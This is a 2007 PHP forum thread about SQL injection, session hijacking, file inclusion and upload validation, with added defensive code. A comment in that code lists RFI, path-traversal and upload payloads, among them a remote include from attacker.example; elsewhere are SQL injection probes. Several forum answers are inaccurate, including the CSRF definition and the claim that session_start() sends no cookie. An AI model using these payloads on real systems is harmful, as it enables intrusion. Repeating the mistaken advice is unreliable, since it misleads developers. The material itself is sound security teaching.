SQL Injection Security PHP

#1  Jul 12th, 2007, 03:24
SuperMember, Sydney
SQL Injection Security PHP

Hi,

I was wondering if the following code is suitable to check user input:

Input_check.php


Code:

<?php
// input_check.php: escape a string for use inside a quoted MySQL string literal.
// (The mysql_* extension and get_magic_quotes_gpc() used here were removed in
// PHP 7; this is the PHP 5-era code the thread is discussing.)
function sql_quote( $value )
{
include 'connectdb_techs.php';   // mysql_real_escape_string() needs an open connection

// undo magic_quotes first so the value is not escaped twice
if( get_magic_quotes_gpc() )
 {
     $value = stripslashes( $value );
 }

if( function_exists( "mysql_real_escape_string" ) )
 {
      $value = mysql_real_escape_string( $value );
 }
 else
 {
     $value = addslashes( $value );
 }

include 'closedb.php';   // was placed after the return, so it never ran
return $value;
}
?>

is called from:

Code:

<?php
session_start();
header("Cache-control: private");
include 'input_check.php';
$user_name = $_POST['user_name'];
$password = $_POST['password'];
// escaped copies go into the session for login2.php / register_page_2.php
$_SESSION['user_name'] = sql_quote($user_name);
$_SESSION['password'] =  sql_quote($password);
$a = isset($_POST['a']) ? $_POST['a'] : '';   // which submit button was pressed
if ($a == 'Login')
 {
 header( 'Location: http://***/login2.php' ) ;
 exit;   // stop here; without it the script keeps running after the redirect
 }

if ($a == 'Register')
 {
 header( 'Location: http://***/register_page_2.php' ) ;
 exit;
 }
?>
Thanks,

Nathan.

#2  Jul 12th, 2007, 10:54
Up'n'Coming Member, UK
Re: SQL Injection Security PHP

Yes, that should work.
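As an added example (not code from the thread), here is the condition under which escaping of the kind sql_quote() does actually protects a query, and the prepared-statement form that removes the question. The mysqli connection details, the users table and its columns, and the function names are assumptions made for the example; it uses mysqli because the mysql_* extension from the posted code no longer exists in PHP 7 and later. Escaping belongs at the point where the query text is built: a value escaped once when it is stored in $_SESSION, as in post #1, and escaped again when it is queried ends up with doubled backslashes.

```php
<?php
// Added example, not code from the thread. Assumes a MySQL database "techs"
// with a table users(id INT, user_name VARCHAR, password VARCHAR holding a
// password_hash() digest); host and credentials below are placeholders.
$db = new mysqli('localhost', 'app', 'secret', 'techs');
if ($db->connect_error) {
    die('database connection failed');
}

// Escaping only works INSIDE a quoted string literal: real_escape_string()
// turns ' into \' so the literal cannot be closed early. The query author
// still has to supply the surrounding quotes.
function find_user_escaped(mysqli $db, string $user_name): ?array
{
    $safe = $db->real_escape_string($user_name);
    $sql  = "SELECT id, user_name FROM users WHERE user_name = '$safe'";
    $res  = $db->query($sql);
    return ($res && ($row = $res->fetch_assoc())) ? $row : null;
}

// The same escaping does NOT protect an unquoted (numeric) context. With
//   "SELECT ... WHERE id = $safe"   and   $safe = "1 OR 1=1"
// there is no quote character to escape, so the injection goes through.
// Cast to the expected type instead of quoting.
function find_user_by_id(mysqli $db, string $id): ?array
{
    $sql = 'SELECT id, user_name FROM users WHERE id = ' . (int) $id;
    $res = $db->query($sql);
    return ($res && ($row = $res->fetch_assoc())) ? $row : null;
}

// Prepared statements send the query text and the values separately, so
// neither context needs application-side quoting or escaping.
function check_login(mysqli $db, string $user_name, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM users WHERE user_name = ? LIMIT 1');
    $stmt->bind_param('s', $user_name);
    $stmt->execute();
    $stmt->bind_result($stored_hash);
    $found = $stmt->fetch();
    $stmt->close();
    // Compare against the stored hash; never against a plaintext column.
    return $found === true && password_verify($password, $stored_hash);
}

// A classic probe. Escaped and quoted, it is just a user name that does not
// exist; bound as a parameter, likewise.
$probe = "' OR '1'='1";
var_dump(find_user_escaped($db, $probe));
var_dump(find_user_by_id($db, '1 OR 1=1'));   // the cast keeps only the leading 1
var_dump(check_login($db, $probe, 'anything'));
```

The rule of thumb the example encodes: escape-and-quote for string literals, cast for numbers, or use placeholders and stop thinking about either.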
#3  Jul 12th, 2007, 11:33
SuperMember, Sydney
Re: SQL Injection Security PHP

Cool, that takes care of malicious input.. I've read there's also issues of a user's session being hijacked and you should re-issue a session ID after login.. is this the case?? Any other security issues I should be aware of??

Thanks,

Nathan.
#4  Jul 12th, 2007, 12:08
Up'n'Coming Member, UK
Re: SQL Injection Security PHP

Session hijacking is when someone finds out the session of another user. The sessionid is normally stored in a cookie, so if someone steals this cookie and sets it as their own, the website will think the person is the user that the cookie was stolen from.
Cookies are normally stolen via XSS vulnerabilities in your site, so make sure all user input is filtered to remove HTML characters.
Another thing you can do to protect against XSS is bind sessions to IP addresses. If you do this, if someone steals a cookie and uses it, their IP will not match the one associated with the cookie, and so they should not be granted access.
Another related security problem is CSRF, although this is not as common. This is when an XSS hole is exploited to cause the user to perform an action that the user didn't choose to do.

More serious security holes include LFI and RFI.
Local File Inclusion is when an include() is exploited, but can only be used to access local files. But, if users are allowed to upload files (e.g. an avatar), this can be a very serious problem, as they could potentially execute code.
Remote File Inclusion is probably the worst coding vulnerability you could get. It is when a user is able to include whatever page they like on your website.
e.g. include($page);
If $page hasn't been defined beforehand, someone could set $page as, e.g. http://www.site.com/c99.txt
This would include the code at c99.txt into your php code.
By doing this, someone can have full access to the files on your site.

If you want me to explain any of them more, just ask.
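An added example (not code from the thread) of the two session points raised above: re-issuing the session ID after login, which post #3 asked about, and tying the session to the client, which post #4 suggests. The function names, the $_SESSION keys and the /login.php redirect target are this example's own choices.

```php
<?php
// Added example, not code from the thread. Re-issues the session ID at
// login (so an ID planted or observed before login is useless) and binds
// the session to the client as post #4 suggests. Function names and the
// $_SESSION keys are this example's own choices.

ini_set('session.use_only_cookies', '1');  // never accept the ID from the URL
ini_set('session.cookie_httponly', '1');   // script in the page cannot read it
// ini_set('session.cookie_secure', '1');  // when the site is served over HTTPS
session_start();

// What the session is tied to. Binding to REMOTE_ADDR, as post #4 proposes,
// logs out users whose address changes (mobile networks, proxy pools);
// the user agent is a weaker but more stable second factor.
function client_fingerprint(): string
{
    return hash('sha256',
        ($_SERVER['REMOTE_ADDR'] ?? '') . '|' . ($_SERVER['HTTP_USER_AGENT'] ?? ''));
}

// Call only after the password has been verified.
function login_session(string $user_name): void
{
    session_regenerate_id(true);          // true: discard the old session data
    $_SESSION['user_name']   = $user_name;
    $_SESSION['fingerprint'] = client_fingerprint();
    $_SESSION['login_time']  = time();
}

// Call at the top of every page that needs a logged-in user.
function require_login(): string
{
    if (empty($_SESSION['user_name'])
        || !hash_equals($_SESSION['fingerprint'] ?? '', client_fingerprint())) {
        // Not logged in, or a copied cookie presented from a different client.
        logout_session();
        header('Location: /login.php');
        exit;
    }
    return $_SESSION['user_name'];
}

function logout_session(): void
{
    $_SESSION = [];
    session_destroy();
    setcookie(session_name(), '', time() - 3600, '/');
}

// Anything from the session that is echoed back is still untrusted text.
// Encoding it is what stops a user name like <script>...</script> from
// turning into the XSS that steals other people's cookies.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage on login.php after a successful credential check:
//   login_session($user_name);
// On a protected page:
//   $user = require_login();
//   echo 'Welcome, ' . h($user);
```

The HttpOnly flag and the output encoding attack the cookie-theft step itself; the fingerprint check is the fallback for a cookie that was stolen anyway.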
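The include($page) pattern from the LFI/RFI paragraph above, shown beside a hardened version, as an added example that is not code from the thread. The page names, the pages/ directory and the function names are assumptions made for the example.

```php
<?php
// Added example, not code from the thread. The page keys, the pages/
// directory and all function names are this example's own.

// VULNERABLE: $page comes straight from the request.
//   ?page=http://attacker.example/c99.txt  -> remote code included (RFI,
//                                             if allow_url_include is on)
//   ?page=../../../../etc/passwd           -> local file read (LFI)
//   ?page=uploads/avatar.jpg               -> an uploaded "image" run as PHP
function show_page_vulnerable(string $page): void
{
    include($page);
}

// HARDENED: the request only selects a key; the file name comes from a map
// that the attacker cannot influence.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): string
{
    // Unknown keys fall back to a fixed default rather than an error page
    // that echoes the input back.
    return PAGES[$requested] ?? PAGES['home'];
}

function show_page(string $requested): void
{
    $file = __DIR__ . '/pages/' . resolve_page($requested);
    include $file;
}

// Where a path really must be built from input (e.g. a template name),
// resolve it and check it is still under the intended base directory.
function safe_path(string $base, string $name): ?string
{
    $real = realpath($base . '/' . $name);
    $base = realpath($base);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // missing, or escaped the base via ../ or a symlink
    }
    return $real;
}

// Usage:
//   show_page($_GET['page'] ?? 'home');
```

The allow-list version never passes request data to include at all, which is the property to aim for; safe_path() is for the cases where that is not possible.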
#5  Jul 13th, 2007, 13:44
SuperMember, Sydney
Re: SQL Injection Security PHP

Crikey, ok... I do need to think about that. I give users the ability to upload images, but I check the extensions first.. and only display in an img tag.. is that safe??

also I use this code to start a page:

Code:

session_start();
header("Cache-control: private");
does this send a cookie to the users machine, or is it all server side??


Other simpler stuff to sort out!!

I'm retrieving data from MySQL to a textbox for editing. I can't get it to work when using the mysql_real_escape_string function.. it keeps either printing slashes or displaying text without line breaks. Is this an important function for security??

Thanks,

Nathan.

Last edited by nate2099; Jul 13th, 2007 at 13:46. Reason: remove weird linky link
#6  Jul 13th, 2007, 14:43
Up'n'Coming Member, UK
Re: SQL Injection Security PHP

Quote:
I give users the ability to upload images, but i check the extensions first.. and only display in an img tag.. is that safe??
If you check extensions it should be fine, although there are always problems with image CSRF. Also, check to make sure uploaded images don't allow any tags, to prevent some persistent XSS.

The problem is not how they are displayed, but how they are uploaded to the server. E.g. If a user is allowed to upload "badfile.php", it will appear on the page as a broken image, but then if a user directly visits that broken file, they will be visiting badfile.php and the server treats it as a typical php file.

Quote:
does this send a cookie to the users machine, or is it all server side??
No cookies are sent here.
See here or look up php.net for more information about sending/processing cookies.

session_start() starts the session. (No surprises there.)
The header sends some HTTP Headers.
There aren't any problems with this, but if the headers are displayed anywhere, e.g. if you display the user agent, then you must remember to filter the strings, as headers can be spoofed using flash for malicious purposes.

Quote:
it keeps either printing slashes
stripslashes() just before putting the data where the text goes. Then use mysql_real_escape_string() when updating or inserting back into the database.

Quote:
displaying text without line breaks
str_replace() \n with <br>.

Quote:
Is this an important function for security??
It does the same as adding slashes to \x00, \n, \r, \, ', " and \x1a; it is important for security.
See here for more information about the function.

Does this help?

Last edited by balaclave; Jul 13th, 2007 at 14:49.
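An added example (not code from the thread) of the "printing slashes" and "no line breaks" points above: sending stored text back into a textbox and displaying it with its line breaks. It uses nl2br() in place of the str_replace() the reply describes, and HTML-encodes the text first, because the escaping that matters on the way out is HTML escaping, not SQL escaping. The sample value is constructed; the assumption is that the text was escaped once on insert, so the stored copy carries no extra backslashes.

```php
<?php
// Added example, not code from the thread. Assumes the page is served as
// UTF-8 and the stored text was escaped exactly once when inserted.

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Refill an edit box. A stored value containing </textarea><script>...
// would otherwise break out of the box and run as script.
function textarea_for(string $name, string $stored): string
{
    return '<textarea name="' . h($name) . '">' . h($stored) . '</textarea>';
}

// Read-only display with the line breaks the textarea had. Encode FIRST,
// then convert newlines, so the <br /> tags nl2br() adds are the only
// tags in the output.
function paragraph_for(string $stored): string
{
    return '<p>' . nl2br(h($stored)) . '</p>';
}

// If the stored copy shows literal backslashes, it was escaped twice
// (magic_quotes plus addslashes()/mysql_real_escape_string()). Calling
// stripslashes() on output hides the symptom; escaping once on insert
// removes the cause.

// Constructed sample value, as it would come back from the database:
$stored = "line one\r\nline two with <b>tag</b> and 'quote'";
echo textarea_for('bio', $stored), "\n";
echo paragraph_for($stored), "\n";
```

Inside a textarea the browser shows the newlines as typed, so no <br> conversion is wanted there; it is only the rendered read-only view that needs nl2br().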
#7  Jul 14th, 2007, 09:45
SuperMember, Sydney
Re: SQL Injection Security PHP

Ok the printing from sql now works.. however..

I just wrote a simple HTML page, saved it to my desktop, renamed it something.jpg, went to my website, created a new user, uploaded something.jpg as my user image, viewed source to see where it was stored, opened a new browser, typed url/filename.jpg and the code executed... bad, right!!
how do I make sure that a file named something.jpg is actually an image file and not script before it's uploaded??
#8  Jul 14th, 2007, 13:58
Up'n'Coming Member, UK
Re: SQL Injection Security PHP

Quote:
I just wrote a simple html page, saved it to my desktop, renamed it something.jpg, went to my website, created new user, uploaded something.jpg as my user image, viewed source to see where it was stored, opened new browser, typed url/filename.jpg and the code executed... bad right!!
how do I make sure that a file named something.jpg is actually an image file and not script before it's uploaded??
After the image is uploaded, check if it's a valid image file. If it is, keep it, if not, destroy it.
Try this:
PHP:

$image = "nameoftheimage.jpg";   // path of the file the person is trying to upload

if (!getimagesize($image)) {
    echo("not a valid image");
    unlink($image);              // throw the rejected file away
} else {
    // save image
    echo("Uploaded");
}
This method still isn't very safe though.
If you combine this with extension checking, the ability to execute server side scripts (e.g. PHP) is stopped, so long as .htaccess doesn't allow image formats to be interpreted as PHP or similar.

This is quite a good article (PDF) and Google has quite a lot of answers.
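An added example (not code from the thread) that takes the getimagesize() check above through to a complete avatar upload handler: the file is validated by content rather than by the name the client chose, re-encoded so nothing but pixels reaches the disk, stored under a server-chosen name, and served through a script that sets the content type so the browser cannot treat it as the HTML page post #7 uploaded. The form field name, the upload directory, the size limit and all function names are assumptions made for the example; it needs the GD extension.

```php
<?php
// Added example, not code from the thread. Assumes a form field "avatar",
// the GD extension, and an upload directory that is either outside the
// web root or has PHP execution switched off (with mod_php, an .htaccess
// containing "php_flag engine off" in that directory does this).
$UPLOAD_DIR = __DIR__ . '/../uploads';   // assumption: not served as PHP
const MAX_BYTES = 512 * 1024;

// Only the types we will serve, with the extension WE assign.
const ALLOWED = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

// Returns the stored file name, or throws on any failure.
function store_avatar(array $file, string $dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed, code ' . $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {   // not a path smuggled in elsewhere
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Content check: getimagesize() parses the image header, so an HTML
    // page renamed to .jpg fails here. A genuine image with PHP appended
    // after the image data would pass, which is why it is re-encoded below.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED[$info[2]])) {
        throw new RuntimeException('not a supported image');
    }
    $ext = ALLOWED[$info[2]];

    // Decode and re-encode: drops comments, EXIF and any trailing payload.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }

    // Random server-chosen name: nothing from $file['name'] reaches the disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    switch ($ext) {
        case 'jpg': $ok = imagejpeg($img, $dest, 85); break;
        case 'png': $ok = imagepng($img, $dest);      break;
        default:    $ok = imagegif($img, $dest);      break;
    }
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name;
}

// Serve through a script that sets the type, rather than by a direct URL,
// so the browser never gets to guess ("sniff") that the body is HTML.
function send_avatar(string $dir, string $name): void
{
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif)$/', $name)) {
        http_response_code(404);   // anything but our own naming scheme
        return;
    }
    $path = rtrim($dir, '/') . '/' . $name;
    $info = is_file($path) ? @getimagesize($path) : false;
    if ($info === false) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . $info['mime']);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Usage in the upload form handler:
//   try { $name = store_avatar($_FILES['avatar'], $UPLOAD_DIR); }
//   catch (RuntimeException $e) { /* show $e->getMessage() to the user */ }
// In avatar.php:
//   send_avatar($UPLOAD_DIR, $_GET['f'] ?? '');
```

Extension checking on the client-supplied name is not in the list because the name is never used: the extension comes from what the decoder found, and the stored name is random, so neither "badfile.php" nor "something.jpg" that is really HTML ever ends up as a file the web server will execute or the browser will render as a page.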
Tags
injection security, php, sql